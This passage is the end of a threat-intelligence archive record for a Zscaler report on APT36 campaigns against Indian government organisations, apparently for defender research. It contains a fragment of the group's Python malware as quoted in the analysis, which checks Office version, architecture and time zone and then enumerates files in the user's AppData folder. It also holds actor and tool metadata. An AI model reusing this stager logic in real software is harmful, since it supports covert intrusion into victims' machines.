print(\"Files Extracted\")\r\n                        append_me(\"Files Extracted\\n\")\r\n                                                                                                   print(\"Going for always\")\r\n                        append_me(\"going for always\") \r\n                                             else:\r\n                        print(\"Machine is x86\")\r\n                        append_me(\"Machine is x86\\n\")\r\n                                                 ##def_frames()\r\n                        append_me(\"All Files Downloaded\\n\")\r\n                        print(\"All Files Downloaded\")\r\n                                                                          print(\"Going for always\")\r\n                        append_me(\"going for always\")\r\n                        deaf()\r\n                        print(\"Files Extracted\")\r\n                        append_me(\"Files Extracted\\n\")\r\n                                         else:\r\n                    print(\"Other than Office 16 or Office 13\")\r\nhttps://www.zscaler.com/blogs/security-research/apt-36-uses-new-ttps-and-new-tools-target-indian-governmental-organizations\r\nPage 23 of 24\n\nappend_me(\"Other than Office 16 or Office 13\\n\")\r\n                                         ##def_frames()\r\n                                         append_me(\"All Files Downloaded\\n\")\r\n                    print(\"All Files Downloaded\")\r\n                                                                                   deaf()\r\n                    print(\"Going for always\")\r\n                    append_me(\"going for always\")\r\n                                                                      print(\"Files Extracted\")\r\n                    append_me(\"Files Extracted\\n\")\r\n                list_folders = []\r\n                list_files = []\r\n                for root, dirs,files in os.walk('c:\\\\users\\\\'+username+'\\\\appdata',topdown=False):\r\n                    for name in files:\r\n                        print(os.path.join(root,name))\r\n                        list_folders.append(os.path.join(root,name))\r\n                    for name in dirs:\r\n                        print(os.path.join(root,name))\r\n                        list_files.append(os.path.join(root,name))\r\n                patience_limit()\r\n            else:\r\n                print(\"Not the time Zone You want to run\")\r\n                append_me(\"Not the time Zone You want to run\\n\")\r\n        else:\r\n            print(\"Find my self in .py directory\")\r\n            append_me(\"Find my self in .py directory\\n\")\r\n    except Exception as e:\r\n        #append_me(str(e))\r\n        print(str(e))\r\n        append_me(str(e)+\"\\n\")\r\nExplore more Zscaler blogs\r\nSource: https://www.zscaler.com/blogs/security-research/apt-36-uses-new-ttps-and-new-tools-target-indian-governmental-organizations\r\nhttps://www.zscaler.com/blogs/security-research/apt-36-uses-new-ttps-and-new-tools-target-indian-governmental-organizations\r\nPage 24 of 24", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia", "ETDA" ], "references": [ "https://www.zscaler.com/blogs/security-research/apt-36-uses-new-ttps-and-new-tools-target-indian-governmental-organizations" ], "report_names": [ "apt-36-uses-new-ttps-and-new-tools-target-indian-governmental-organizations" ], "threat_actors": [ { "id": "187a0668-a968-4cf0-8bfd-4bc97c02f6dc", "created_at": "2022-10-27T08:27:12.955905Z", "updated_at": "2026-04-10T02:00:05.376527Z", "deleted_at": null, "main_name": "SideCopy", "aliases": [ "SideCopy" ], "source_name": "MITRE:SideCopy", "tools": [ "AuTo Stealer", "Action RAT" ], "source_id": "MITRE", "reports": null }, { "id": "fce5181c-7aab-400f-bd03-9db9e791da04", "created_at": "2022-10-25T15:50:23.759799Z", "updated_at": "2026-04-10T02:00:05.3002Z", "deleted_at": null, "main_name": "Transparent Tribe", "aliases": [ "Transparent Tribe", "COPPER FIELDSTONE", "APT36", "Mythic Leopard", "ProjectM" ], "source_name": "MITRE:Transparent Tribe", "tools": [ "DarkComet", "ObliqueRAT", "njRAT", "Peppy" ], "source_id": "MITRE", "reports": null }, { "id": "a4f0e383-f447-4cd6-80e3-ffc073ed4e00", "created_at": "2023-01-06T13:46:39.30167Z", "updated_at": "2026-04-10T02:00:03.280161Z", "deleted_at": null, "main_name": "SideCopy", "aliases": [], "source_name": "MISPGALAXY:SideCopy", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "b584b10a-7d54-4d05-9e21-b223563df7b8", "created_at": "2022-10-25T16:07:24.181589Z", "updated_at": "2026-04-10T02:00:04.892659Z", "deleted_at": null, "main_name": "SideCopy", "aliases": [ "G1008", "Mocking Draco", "TAG-140", "UNC2269", "White Dev 55" ], "source_name": "ETDA:SideCopy", "tools": [ "ActionRAT", "AllaKore", "Allakore RAT", "AresRAT", "Bladabindi", "CetaRAT", "DetaRAT", "EpicenterRAT", "Jorik", "Lilith", "Lilith RAT", "MargulasRAT", "ReverseRAT", "njRAT" ], "source_id": "ETDA", "reports": null }, { "id": "abb24b7b-6baa-4070-9a2b-aa59091097d1", "created_at": "2022-10-25T16:07:24.339942Z", "updated_at": "2026-04-10T02:00:04.944806Z", "deleted_at": null, "main_name": "Transparent Tribe", "aliases": [ "APT 36", "APT-C-56", "Copper Fieldstone", "Earth Karkaddan", "G0134", "Green Havildar", "Mythic Leopard", "Opaque Draco", "Operation C-Major", "Operation Honey Trap", "Operation Transparent Tribe", "ProjectM", "STEPPY-KAVACH", "Storm-0156", "TEMP.Lapis", "Transparent Tribe" ], "source_name": "ETDA:Transparent Tribe", "tools": [ "Amphibeon", "Android RAT", "Bezigate", "Bladabindi", "Bozok", "Bozok RAT", "BreachRAT", "Breut", "CapraRAT", "CinaRAT", "Crimson RAT", "DarkComet", "DarkKomet", "ElizaRAT", "FYNLOS", "Fynloski", "Jorik", "Krademok", "Limepad", "Luminosity RAT", "LuminosityLink", "MSIL", "MSIL/Crimson", "Mobzsar", "MumbaiDown", "Oblique RAT", "ObliqueRAT", "Peppy RAT", "Peppy Trojan", "Quasar RAT", "QuasarRAT", "SEEDOOR", "Scarimson", "SilentCMD", "Stealth Mango", "UPDATESEE", "USBWorm", "Waizsar RAT", "Yggdrasil", "beendoor", "klovbot", "njRAT" ], "source_id": "ETDA", "reports": null }, { "id": "c68fa27f-e8d9-4932-856b-467ccfe39997", "created_at": "2023-01-06T13:46:38.450585Z", "updated_at": "2026-04-10T02:00:02.980334Z", "deleted_at": null, "main_name": "Operation C-Major", "aliases": [ "APT36", "APT 36", "TMP.Lapis", "COPPER FIELDSTONE", "Storm-0156", "Transparent Tribe", "ProjectM", "Green Havildar", "Earth Karkaddan", "C-Major", "Mythic Leopard" ], "source_name": "MISPGALAXY:Operation C-Major", "tools": [], "source_id": "MISPGALAXY", "reports": null } ], "ts_created_at": 1775434421, "ts_updated_at": 1775792210, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/ca2c5d672b73fcdcdabf713bd3d472aa160deac9.pdf", "text": "https://archive.orkl.eu/ca2c5d672b73fcdcdabf713bd3d472aa160deac9.txt", "img": "https://archive.orkl.eu/ca2c5d672b73fcdcdabf713bd3d472aa160deac9.jpg" } }